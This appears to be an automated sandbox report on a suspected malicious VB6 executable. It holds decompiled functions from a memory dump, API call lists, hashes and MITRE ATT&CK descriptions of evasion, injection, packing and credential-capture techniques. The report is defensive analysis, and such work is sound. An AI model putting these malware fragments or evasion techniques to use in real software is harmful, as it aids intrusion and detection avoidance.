Strings

diktaturs, xrefs: 0040FF9C
ABC, xrefs: 0040FE8E

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#531#702ChkstkNew2
String ID: ABC$diktaturs
API String ID: 1156614088-2872196872
Opcode ID: 15b364c55b9f81ee2d8ff2b7d81445ec119a720e8ce0c2a6d7327ac9bcbbe917
Instruction ID: 387b7d44bbb873d3f1eeb646bcec43e3c9abf43532bfd009b38f020aa540208c
Opcode Fuzzy Hash: 15b364c55b9f81ee2d8ff2b7d81445ec119a720e8ce0c2a6d7327ac9bcbbe917
Instruction Fuzzy Hash: 5D410570900209AFDB10EFE5C949BDDBBB4BB08714F20813AE511BB6E1D7B85949CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041147A, Relevance: 24.1, APIs: 16, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041147A(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a8) {
				intOrPtr _v8;
				long long* _v12;
				char _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				signed int _v44;
				char _v52;
				signed int _v60;
				char _v68;
				void* _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed int _v116;
				long long _v128;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				signed int _t65;
				signed int _t72;
				char* _t78;
				long long* _t90;
				long long _t98;

				_push(0x401236);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t90;
				_push(0x7c);
				L00401230();
				_v12 = _t90;
				_v8 = 0x4011c8;
				_t78 =  &_v24;
				L00401350();
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				_push( &_v68);
				_push( &_v52);
				_push(_t78);
				_push(_t78);
				 *_t90 =  *0x4011c0;
				_t98 =  *0x4011b8;
				_push(_t78);
				_push(_t78);
				 *_t90 = _t98;
				asm("fld1");
				_push(_t78);
				_push(_t78);
				 *_t90 = _t98;
				L004012F6();
				L004012FC();
				_v128 = _t98;
				asm("fchs");
				L004012FC();
				asm("fcomp qword [ebp-0x7c]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t13 =  &_v132;
					 *_t13 = _v132 & 0x00000000;
					__eflags =  *_t13;
				} else {
					_v132 = 1;
				}
				_v104 =  ~_v132;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L0040137A();
				_t65 = _v104;
				if(_t65 != 0) {
					_v44 = _v44 & 0x00000000;
					_v52 = 2;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v52);
					L004012F0();
					L004013A4();
					L00401392();
					if( *0x413418 != 0) {
						_v136 = 0x413418;
					} else {
						_push(0x413418);
						_push(0x40293c);
						L00401374();
						_v136 = 0x413418;
					}
					_v104 =  *_v136;
					_t72 =  *((intOrPtr*)( *_v104 + 0x4c))(_v104,  &_v36);
					asm("fclex");
					_v108 = _t72;
					if(_v108 >= 0) {
						_t39 =  &_v140;
						 *_t39 = _v140 & 0x00000000;
						__eflags =  *_t39;
					} else {
						_push(0x4c);
						_push(0x40292c);
						_push(_v104);
						_push(_v108);
						L0040136E();
						_v140 = _t72;
					}
					_v112 = _v36;
					_t65 =  *((intOrPtr*)( *_v112 + 0x28))(_v112);
					asm("fclex");
					_v116 = _t65;
					if(_v116 >= 0) {
						_t51 =  &_v144;
						 *_t51 = _v144 & 0x00000000;
						__eflags =  *_t51;
					} else {
						_push(0x28);
						_push(0x4029e0);
						_push(_v112);
						_push(_v116);
						L0040136E();
						_v144 = _t65;
					}
					L00401368();
					_push(0xa9);
					L0040130E();
					_v28 = _t65;
				}
				asm("wait");
				_push(0x411671);
				L004013B0();
				L004013B0();
				return _t65;
			}

0x0041147f
0x0041148a
0x0041148b
0x00411492
0x00411495
0x0041149d
0x004114a0
0x004114aa
0x004114ad
0x004114b2
0x004114b9
0x004114c0
0x004114c7
0x004114d1
0x004114d5
0x004114dc
0x004114dd
0x004114de
0x004114e1
0x004114e7
0x004114e8
0x004114e9
0x004114ec
0x004114ee
0x004114ef
0x004114f0
0x004114f3
0x004114f8
0x004114fd
0x00411506
0x00411508
0x0041150d
0x00411510
0x00411512
0x00411513
0x0041151e
0x0041151e
0x0041151e
0x00411515
0x00411515
0x00411515
0x00411527
0x0041152e
0x00411532
0x00411533
0x00411535
0x0041153d
0x00411543
0x00411549
0x0041154d
0x00411554
0x00411556
0x00411558
0x0041155a
0x0041155f
0x00411560
0x0041156a
0x00411572
0x0041157e
0x0041159b
0x00411580
0x00411580
0x00411585
0x0041158a
0x0041158f
0x0041158f
0x004115ad
0x004115bc
0x004115bf
0x004115c1
0x004115c8
0x004115e4
0x004115e4
0x004115e4
0x004115ca
0x004115ca
0x004115cc
0x004115d1
0x004115d4
0x004115d7
0x004115dc
0x004115dc
0x004115ee
0x004115f9
0x004115fc
0x004115fe
0x00411605
0x00411621
0x00411621
0x00411621
0x00411607
0x00411607
0x00411609
0x0041160e
0x00411611
0x00411614
0x00411619
0x00411619
0x0041162b
0x00411630
0x00411635
0x0041163a
0x0041163a
0x0041163d
0x0041163e
0x00411663
0x0041166b
0x00411670

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 00411495
__vbaStrCopy.MSVBVM60(?,?,?,?,00401236), ref: 004114AD
#678.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 004114F3
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 004114F8
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00411508
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00411535
#704.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00411560
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041156A
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00411572
__vbaNew2.MSVBVM60(0040293C,00413418,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041158A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,0000004C), ref: 004115D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029E0,00000028), ref: 00411614
__vbaFreeObj.MSVBVM60(00000000,?,004029E0,00000028), ref: 0041162B
#570.MSVBVM60(000000A9), ref: 00411635
__vbaFreeStr.MSVBVM60(00411671), ref: 00411663
__vbaFreeStr.MSVBVM60(00411671), ref: 0041166B

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#570#678#704ChkstkCopyListMoveNew2
String ID:
API String ID: 2851493834-0
Opcode ID: 2d08c8c4d0cfd305d50e99d2877eb7c6803897c61ad51bf62ce493348d0bcbd8
Instruction ID: 853be40f8af49f836c18458788eed5fd231296939b6e5f1900c4ab223217335a
Opcode Fuzzy Hash: 2d08c8c4d0cfd305d50e99d2877eb7c6803897c61ad51bf62ce493348d0bcbd8
Instruction Fuzzy Hash: 1D510870910218EBDB10EF91CD85BEEBBB9FB08714F20426EF105B71A1DB785944DB29

Uniqueness

Uniqueness Score: -1.00%

Function 00410E07, Relevance: 21.2, APIs: 14, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00410E07(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				short _v32;
				char _v36;
				char _v52;
				char _v68;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				void* _v120;
				void* _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				short _t89;
				signed int _t92;
				signed int _t98;
				signed int _t103;
				signed int _t110;
				void* _t121;
				void* _t123;
				intOrPtr _t124;

				_t124 = _t123 - 0xc;
				 *[fs:0x0] = _t124;
				L00401230();
				_v16 = _t124;
				_v12 = 0x401190;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401236, _t121);
				_v92 = 0x4029d4;
				_v100 = 8;
				L00401380();
				_push( &_v52);
				_push( &_v68);
				L00401314();
				_v108 = 0x4029dc;
				_v116 = 0x8008;
				_push( &_v68);
				_t89 =  &_v116;
				_push(_t89);
				L0040132C();
				_v124 = _t89;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L0040137A();
				_t92 = _v124;
				if(_t92 != 0) {
					if( *0x413418 != 0) {
						_v148 = 0x413418;
					} else {
						_push(0x413418);
						_push(0x40293c);
						L00401374();
						_v148 = 0x413418;
					}
					_v124 =  *_v148;
					_t98 =  *((intOrPtr*)( *_v124 + 0x14))(_v124,  &_v36);
					asm("fclex");
					_v128 = _t98;
					if(_v128 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40292c);
						_push(_v124);
						_push(_v128);
						L0040136E();
						_v152 = _t98;
					}
					_v132 = _v36;
					_t103 =  *((intOrPtr*)( *_v132 + 0x108))(_v132,  &_v120);
					asm("fclex");
					_v136 = _t103;
					if(_v136 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x108);
						_push(0x402950);
						_push(_v132);
						_push(_v136);
						L0040136E();
						_v156 = _t103;
					}
					_v32 = _v120;
					L00401368();
					if( *0x413418 != 0) {
						_v160 = 0x413418;
					} else {
						_push(0x413418);
						_push(0x40293c);
						L00401374();
						_v160 = 0x413418;
					}
					_v124 =  *_v160;
					_t110 =  *((intOrPtr*)( *_v124 + 0x4c))(_v124,  &_v36);
					asm("fclex");
					_v128 = _t110;
					if(_v128 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40292c);
						_push(_v124);
						_push(_v128);
						L0040136E();
						_v164 = _t110;
					}
					_v132 = _v36;
					_t92 =  *((intOrPtr*)( *_v132 + 0x28))(_v132);
					asm("fclex");
					_v136 = _t92;
					if(_v136 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x28);
						_push(0x4029e0);
						_push(_v132);
						_push(_v136);
						L0040136E();
						_v168 = _t92;
					}
					L00401368();
					_push(0xa9);
					L0040130E();
					_v28 = _t92;
				}
				_push(0x411076);
				return _t92;
			}

0x00410e0a
0x00410e19
0x00410e25
0x00410e2d
0x00410e30
0x00410e37
0x00410e46
0x00410e49
0x00410e50
0x00410e5d
0x00410e65
0x00410e69
0x00410e6a
0x00410e6f
0x00410e76
0x00410e80
0x00410e81
0x00410e84
0x00410e85
0x00410e8a
0x00410e91
0x00410e95
0x00410e96
0x00410e98
0x00410ea0
0x00410ea6
0x00410eb3
0x00410ed0
0x00410eb5
0x00410eb5
0x00410eba
0x00410ebf
0x00410ec4
0x00410ec4
0x00410ee2
0x00410ef1
0x00410ef4
0x00410ef6
0x00410efd
0x00410f19
0x00410eff
0x00410eff
0x00410f01
0x00410f06
0x00410f09
0x00410f0c
0x00410f11
0x00410f11
0x00410f23
0x00410f32
0x00410f38
0x00410f3a
0x00410f47
0x00410f69
0x00410f49
0x00410f49
0x00410f4e
0x00410f53
0x00410f56
0x00410f5c
0x00410f61
0x00410f61
0x00410f74
0x00410f7b
0x00410f87
0x00410fa4
0x00410f89
0x00410f89
0x00410f8e
0x00410f93
0x00410f98
0x00410f98
0x00410fb6
0x00410fc5
0x00410fc8
0x00410fca
0x00410fd1
0x00410fed
0x00410fd3
0x00410fd3
0x00410fd5
0x00410fda
0x00410fdd
0x00410fe0
0x00410fe5
0x00410fe5
0x00410ff7
0x00411002
0x00411005
0x00411007
0x00411014
0x00411033
0x00411016
0x00411016
0x00411018
0x0041101d
0x00411020
0x00411026
0x0041102b
0x0041102b
0x0041103d
0x00411042
0x00411047
0x0041104c
0x0041104c
0x0041104f
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 00410E25
__vbaVarDup.MSVBVM60 ref: 00410E5D
#528.MSVBVM60(?,?), ref: 00410E6A
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 00410E85
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 00410E98
__vbaNew2.MSVBVM60(0040293C,00413418,?,?,00401236), ref: 00410EBF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,00000014), ref: 00410F0C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,00000108), ref: 00410F5C
__vbaFreeObj.MSVBVM60(00000000,?,00402950,00000108), ref: 00410F7B
__vbaNew2.MSVBVM60(0040293C,00413418), ref: 00410F93
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,0000004C), ref: 00410FE0
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029E0,00000028), ref: 00411026
__vbaFreeObj.MSVBVM60(00000000,?,004029E0,00000028), ref: 0041103D
#570.MSVBVM60(000000A9), ref: 00411047

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$#528#570ChkstkList
String ID:
API String ID: 4267626096-0
Opcode ID: 904501d4d831e44ef3c65b95543ba94fd84c7a574697dde80e5012a2fa522249
Instruction ID: 348fd8ffbcb1d8a91596785cfddb04ef991d0eb3d3694d2b02d35694fb9491c2
Opcode Fuzzy Hash: 904501d4d831e44ef3c65b95543ba94fd84c7a574697dde80e5012a2fa522249
Instruction Fuzzy Hash: CC61E474D00228EFEB21DFA4C845BDDBBB4BF08304F1040AAE505B72A2D7B85985DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040FBE5, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FC02
#696.MSVBVM60(004028FC,?,?,?,?,00401236), ref: 0040FC19
#539.MSVBVM60(?,00000001,00000001,00000001,004028FC,?,?,?,?,00401236), ref: 0040FC32
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001,004028FC,?,?,?,?,00401236), ref: 0040FC3B
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001,004028FC,?,?,?,?,00401236), ref: 0040FC45
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001,004028FC,?,?,?,?,00401236), ref: 0040FC4D
#598.MSVBVM60(?,?,00000001,00000001,00000001,004028FC,?,?,?,?,00401236), ref: 0040FC52
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040FC95
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 0040FCAC
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 0040FCC3
__vbaFreeStr.MSVBVM60(0040FCFC,004028FC,?,?,?,?,00401236), ref: 0040FCF6

Strings

viljelsheds, xrefs: 0040FC81

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#539#595#598#696ChkstkList
String ID: viljelsheds
API String ID: 1578966974-3410470491
Opcode ID: 20d01c0965d5e75e78c2d54672b9378b5cfa063fb03f594d04095d68e2de78e4
Instruction ID: 36e7a612cfd887cc65fb554be27d5ee97dfa525c1aae4a42cef3e1471acbc2cd
Opcode Fuzzy Hash: 20d01c0965d5e75e78c2d54672b9378b5cfa063fb03f594d04095d68e2de78e4
Instruction Fuzzy Hash: B521C9B194024CAAEB10EBD1C886FDEBB7CEF04704F54413AF601BB591D7B85549CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAF4, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040FAF4(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				char _v40;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char* _t30;
				char* _t33;
				char* _t37;
				void* _t42;
				void* _t44;
				intOrPtr _t45;

				_t45 = _t44 - 0xc;
				 *[fs:0x0] = _t45;
				L00401230();
				_v16 = _t45;
				_v12 = 0x401128;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401236, _t42);
				_push( &_v56);
				_push(_v52);
				_t30 =  &_v64;
				_push(_t30);
				L004013C8();
				_push(_t30);
				_push( &_v40);
				_push(0);
				_push( *_a16);
				_t33 =  &_v60;
				_push(_t33);
				L004013C8();
				_push(_t33);
				_push(_v28);
				E00402884();
				_v68 = _t33;
				L004013C2();
				_push(_v60);
				_push(_a16);
				L004013BC();
				_push(_v64);
				_push( &_v52);
				L004013BC();
				_v36 = _v68;
				_push( &_v64);
				_t37 =  &_v60;
				_push(_t37);
				_push(2);
				L004013B6();
				_push(0x40fbbc);
				L004013B0();
				return _t37;
			}

0x0040faf7
0x0040fb06
0x0040fb10
0x0040fb18
0x0040fb1b
0x0040fb22
0x0040fb31
0x0040fb37
0x0040fb38
0x0040fb3b
0x0040fb3e
0x0040fb3f
0x0040fb44
0x0040fb48
0x0040fb49
0x0040fb4e
0x0040fb50
0x0040fb53
0x0040fb54
0x0040fb59
0x0040fb5a
0x0040fb5d
0x0040fb62
0x0040fb65
0x0040fb6a
0x0040fb6d
0x0040fb70
0x0040fb75
0x0040fb7b
0x0040fb7c
0x0040fb84
0x0040fb8a
0x0040fb8b
0x0040fb8e
0x0040fb8f
0x0040fb91
0x0040fb99
0x0040fbb6
0x0040fbbb

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FB10
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,00401236), ref: 0040FB3F
__vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00401236), ref: 0040FB54
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00401236), ref: 0040FB65
__vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?), ref: 0040FB70
__vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?), ref: 0040FB7C
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?), ref: 0040FB91
__vbaFreeStr.MSVBVM60(0040FBBC,?,?,00401236), ref: 0040FBB6

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AnsiFreeUnicode$ChkstkErrorListSystem
String ID:
API String ID: 3908248399-0
Opcode ID: 031402b0d736d70a3259af9cfd78d2098ff9d5f6f5b51d7f74496af319f010ac
Instruction ID: 0b533fddaae80eb38eb42e3e8f470ba4a65a9706751bf999df85393180296bef
Opcode Fuzzy Hash: 031402b0d736d70a3259af9cfd78d2098ff9d5f6f5b51d7f74496af319f010ac
Instruction Fuzzy Hash: 2F11B7B2910209BBDF01EFD1DD46EDEBBBCEF04704F00416AFA00B65A1D779AA148B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD19, Relevance: 10.6, APIs: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040FD19(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				signed int _v32;
				void* _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _t47;
				signed int _t52;
				signed int _t53;
				intOrPtr _t64;

				_push(0x401236);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t64;
				_push(0x34);
				L00401230();
				_v12 = _t64;
				_v8 = 0x401148;
				if( *0x413418 != 0) {
					_v64 = 0x413418;
				} else {
					_push(0x413418);
					_push(0x40293c);
					L00401374();
					_v64 = 0x413418;
				}
				_v40 =  *_v64;
				_t47 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
				asm("fclex");
				_v44 = _t47;
				if(_v44 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40292c);
					_push(_v40);
					_push(_v44);
					L0040136E();
					_v68 = _t47;
				}
				_v48 = _v36;
				_t52 =  *((intOrPtr*)( *_v48 + 0x130))(_v48,  &_v32);
				asm("fclex");
				_v52 = _t52;
				if(_v52 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x402950);
					_push(_v48);
					_push(_v52);
					L0040136E();
					_v72 = _t52;
				}
				_t53 = _v32;
				_v60 = _t53;
				_v32 = _v32 & 0x00000000;
				L004013A4();
				L00401368();
				_v24 = 0x63601b;
				_push(0x40fe31);
				L004013B0();
				return _t53;
			}

0x0040fd1e
0x0040fd29
0x0040fd2a
0x0040fd31
0x0040fd34
0x0040fd3c
0x0040fd3f
0x0040fd4d
0x0040fd67
0x0040fd4f
0x0040fd4f
0x0040fd54
0x0040fd59
0x0040fd5e
0x0040fd5e
0x0040fd73
0x0040fd82
0x0040fd85
0x0040fd87
0x0040fd8e
0x0040fda7
0x0040fd90
0x0040fd90
0x0040fd92
0x0040fd97
0x0040fd9a
0x0040fd9d
0x0040fda2
0x0040fda2
0x0040fdae
0x0040fdbd
0x0040fdc3
0x0040fdc5
0x0040fdcc
0x0040fde8
0x0040fdce
0x0040fdce
0x0040fdd3
0x0040fdd8
0x0040fddb
0x0040fdde
0x0040fde3
0x0040fde3
0x0040fdec
0x0040fdef
0x0040fdf2
0x0040fdfc
0x0040fe04
0x0040fe09
0x0040fe10
0x0040fe2b
0x0040fe30

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FD34
__vbaNew2.MSVBVM60(0040293C,00413418,?,?,?,?,00401236), ref: 0040FD59
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,00000014), ref: 0040FD9D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,00000130), ref: 0040FDDE
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401236), ref: 0040FDFC
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401236), ref: 0040FE04
__vbaFreeStr.MSVBVM60(0040FE31,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401236), ref: 0040FE2B

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$ChkstkMoveNew2
String ID:
API String ID: 1253681662-0
Opcode ID: 116c5e1a985369f3168bfbf4e3c9d3e56cb34c434bf93c8e3cee19f57acabea8
Instruction ID: 66deb990b0f0cc1324bc5d270b1fe90238928332bcf628d1e1d7a91dafec7a58
Opcode Fuzzy Hash: 116c5e1a985369f3168bfbf4e3c9d3e56cb34c434bf93c8e3cee19f57acabea8
Instruction Fuzzy Hash: F131D271D10218AFDB21DFA5C849BDEBBF4BF08705F10803AF501B66A0D7786A49DB68

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

